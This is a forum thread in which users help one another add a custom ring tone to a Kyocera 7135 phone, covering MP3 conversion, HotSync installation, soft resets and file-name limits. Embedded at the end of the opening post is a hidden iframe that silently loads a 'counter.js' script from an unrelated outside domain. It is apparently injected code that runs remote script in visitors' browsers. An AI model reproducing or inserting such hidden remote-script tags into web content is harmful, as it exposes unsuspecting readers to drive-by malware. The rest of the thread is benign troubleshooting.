+ Reply to Thread

Adding a ring tone to a Kyocera 7135

I've read the manual; I've read the faqs.
    I still can't figure out how to add a ring tone to my phone.

The ring tone I have in mind is a .wav file.

I'm using a Mac, OS X.
    Can anyone help?

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Convert it to a MP3, use the "Kyo MP# Ringer Maker", download it to your phone via Hot Sync and select it in your prefrences. Make sure the name is less than 20 character.
    Larry
    XV6900/Treo700w/Samsung I600/Kyo7135

Thumbs up

TOO COOL.

Do you know where these files are stored on the palm? I notice that I am eating up memory (obviously) but I can't find them to delete them after trying them.

ST

In internal memory (RAM) under the MP3 section if you use the File Manager. You can see the alphabetically if you use FileZ.
    Larry
    XV6900/Treo700w/Samsung I600/Kyo7135

Thanks,

I found it now. I used the trash function in Launch em. It was strange I couldn't see it when I hit delete in the standard Palm Launcher.

ST

I'm still having trouble with the ring maker. I've converted the mp3, installed them via hot sync but still can't find them on the phone. Any ideas?
    Jim

Are you sure you have actually set it up to hot synch? After you convert it with the MP3 ring maker you need to find the palm data base file and ensure it is sent to the Hotsynch install tool.

Then under phone preferences-> Incoming Calls--> Ringer it should be listed as the last file in the drop down list.

ST

Finding Ring Tones

After you install the new ringtone, you need to do a soft reset by hitting the reset button under the battery cover.

Once you've reset, the ringtone will show up on the list.

I have been using the Palm desktop install tool to install the ring tone. Is that not how I should be doing it?

Jim
    Jim

YES !!!

You are correct.

You should use the palm install tool to install the new ringer.

Then Hot Sync the phone.

Do a soft reset, and then go look for the ringer. It should be on the bottom of the list.

If it's not there, to trouble shoot,I suggest you check the following steps. I apologize if they seem simplistic and you have already done them.

Check the Hot Sync log. Maybe the file you created is corrupted somehow and didn't get transferred to the phone.

When you created the .pdb file, did you use a name less than 7 letters long ?

Is the .pdb file created as a ringer ?? The MP3 maker software allows for flip sounds, alarms, etc. Perhaps you inadvertantly created a flip sound when you meant to create a ringer.

Follow this link for a good set of instructions.

http://www.smartphonesource.com/vbul...&threadid=4845

MIssion accomplished! Thanks so much for everyone's help. I was changing the name of the mp3 after creating the ringer not before, thus the problems.

Thanks again!
    Jim

I'm using a Mac

I'm using a mac and the MP3 Ringer Maker application seems to be a Windows application. Is there a similar application for the Mac? Is there something I missed in my ignorance?

Problems here too

Sorry to resurect the older thread, but, any help would be welcomed.

I'm following the instructions in the link above, but, when I sync, I get the following error in the log:

Invalid handheld file deleted: C:\Kyocer\Install\Mrng1.MP3.pdb

Any idea why this isn't working? Do I need to remove the MP3 suffix? I looked in my file listing on the 7135 and under the MP3 directory, there are files with this suffix.

Thanks in advance for clarifications.
    Joe